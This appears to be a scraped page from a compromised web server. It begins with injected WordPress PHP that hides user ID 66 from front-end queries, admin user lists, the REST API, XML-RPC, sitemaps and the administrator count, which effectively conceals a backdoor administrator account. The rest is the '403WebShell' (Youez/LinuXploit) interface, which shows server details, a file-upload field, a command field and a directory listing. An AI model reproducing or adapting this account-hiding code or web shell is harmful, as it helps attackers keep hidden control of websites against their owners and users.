add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/jungly/node_modules/@types/node/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
January 01 1970 00:00:00
root / root
0
assert
--
February 13 2026 18:52:20
www-data / www-data
0755
compatibility
--
February 13 2026 18:52:20
www-data / www-data
0755
dns
--
February 13 2026 18:52:20
www-data / www-data
0755
fs
--
February 13 2026 18:52:20
www-data / www-data
0755
inspector
--
February 13 2026 18:52:20
www-data / www-data
0755
path
--
February 13 2026 18:52:20
www-data / www-data
0755
readline
--
February 13 2026 18:52:20
www-data / www-data
0755
stream
--
February 13 2026 18:52:20
www-data / www-data
0755
test
--
February 13 2026 18:52:20
www-data / www-data
0755
timers
--
February 13 2026 18:52:20
www-data / www-data
0755
ts5.6
--
February 13 2026 18:52:20
www-data / www-data
0755
ts5.7
--
February 13 2026 18:52:20
www-data / www-data
0755
util
--
February 13 2026 18:52:20
www-data / www-data
0755
web-globals
--
February 13 2026 18:52:20
www-data / www-data
0755
LICENSE
1.114 KB
February 13 2026 18:52:16
www-data / www-data
0664
README.md
1.545 KB
February 13 2026 18:52:16
www-data / www-data
0664
assert.d.ts
39.135 KB
February 13 2026 18:52:17
www-data / www-data
0664
async_hooks.d.ts
25.599 KB
February 13 2026 18:52:17
www-data / www-data
0664
buffer.buffer.d.ts
22.08 KB
February 13 2026 18:52:17
www-data / www-data
0664
buffer.d.ts
80.704 KB
February 13 2026 18:52:17
www-data / www-data
0664
child_process.d.ts
61.907 KB
February 13 2026 18:52:17
www-data / www-data
0664
cluster.d.ts
20.715 KB
February 13 2026 18:52:17
www-data / www-data
0664
console.d.ts
6.6 KB
February 13 2026 18:52:18
www-data / www-data
0664
constants.d.ts
0.801 KB
February 13 2026 18:52:18
www-data / www-data
0664
crypto.d.ts
168.106 KB
February 13 2026 18:52:18
www-data / www-data
0664
dgram.d.ts
25.053 KB
February 13 2026 18:52:18
www-data / www-data
0664
diagnostics_channel.d.ts
24.466 KB
February 13 2026 18:52:18
www-data / www-data
0664
dns.d.ts
35.28 KB
February 13 2026 18:52:19
www-data / www-data
0664
domain.d.ts
7.334 KB
February 13 2026 18:52:19
www-data / www-data
0664
events.d.ts
47.942 KB
February 13 2026 18:52:19
www-data / www-data
0664
fs.d.ts
192.768 KB
February 13 2026 18:52:19
www-data / www-data
0664
globals.d.ts
5.012 KB
February 13 2026 18:52:19
www-data / www-data
0664
globals.typedarray.d.ts
4.75 KB
February 13 2026 18:52:19
www-data / www-data
0664
http.d.ts
93.77 KB
February 13 2026 18:52:19
www-data / www-data
0664
http2.d.ts
115.659 KB
February 13 2026 18:52:19
www-data / www-data
0664
https.d.ts
16.595 KB
February 13 2026 18:52:19
www-data / www-data
0664
index.d.ts
4.913 KB
February 13 2026 18:52:19
www-data / www-data
0664
inspector.d.ts
10.15 KB
February 13 2026 18:52:19
www-data / www-data
0664
inspector.generated.d.ts
209.46 KB
February 13 2026 18:52:19
www-data / www-data
0664
module.d.ts
36.503 KB
February 13 2026 18:52:19
www-data / www-data
0664
net.d.ts
40.68 KB
February 13 2026 18:52:19
www-data / www-data
0664
os.d.ts
18.982 KB
February 13 2026 18:52:19
www-data / www-data
0664
package.json
4.403 KB
February 13 2026 18:52:19
www-data / www-data
0664
path.d.ts
7.703 KB
February 13 2026 18:52:19
www-data / www-data
0664
perf_hooks.d.ts
24.032 KB
February 13 2026 18:52:19
www-data / www-data
0664
process.d.ts
106.078 KB
February 13 2026 18:52:19
www-data / www-data
0664
punycode.d.ts
5.33 KB
February 13 2026 18:52:19
www-data / www-data
0664
querystring.d.ts
6.963 KB
February 13 2026 18:52:19
www-data / www-data
0664
quic.d.ts
29.244 KB
February 13 2026 18:52:19
www-data / www-data
0664
readline.d.ts
21.815 KB
February 13 2026 18:52:19
www-data / www-data
0664
repl.d.ts
18.031 KB
February 13 2026 18:52:19
www-data / www-data
0664
sea.d.ts
6.482 KB
February 13 2026 18:52:19
www-data / www-data
0664
sqlite.d.ts
45.264 KB
February 13 2026 18:52:19
www-data / www-data
0664
stream.d.ts
85.831 KB
February 13 2026 18:52:19
www-data / www-data
0664
string_decoder.d.ts
2.748 KB
February 13 2026 18:52:19
www-data / www-data
0664
test.d.ts
100.575 KB
February 13 2026 18:52:20
www-data / www-data
0664
timers.d.ts
7.762 KB
February 13 2026 18:52:20
www-data / www-data
0664
tls.d.ts
56.509 KB
February 13 2026 18:52:20
www-data / www-data
0664
trace_events.d.ts
8.722 KB
February 13 2026 18:52:20
www-data / www-data
0664
tty.d.ts
11.951 KB
February 13 2026 18:52:20
www-data / www-data
0664
url.d.ts
22.962 KB
February 13 2026 18:52:20
www-data / www-data
0664
util.d.ts
63.4 KB
February 13 2026 18:52:20
www-data / www-data
0664
v8.d.ts
39.636 KB
February 13 2026 18:52:20
www-data / www-data
0664
vm.d.ts
54.119 KB
February 13 2026 18:52:20
www-data / www-data
0664
wasi.d.ts
8.911 KB
February 13 2026 18:52:20
www-data / www-data
0664
worker_threads.d.ts
30.636 KB
February 13 2026 18:52:20
www-data / www-data
0664
zlib.d.ts
23.346 KB
February 13 2026 18:52:20
www-data / www-data
0664

Youez - 2016 - github.com/yon3zu
LinuXploit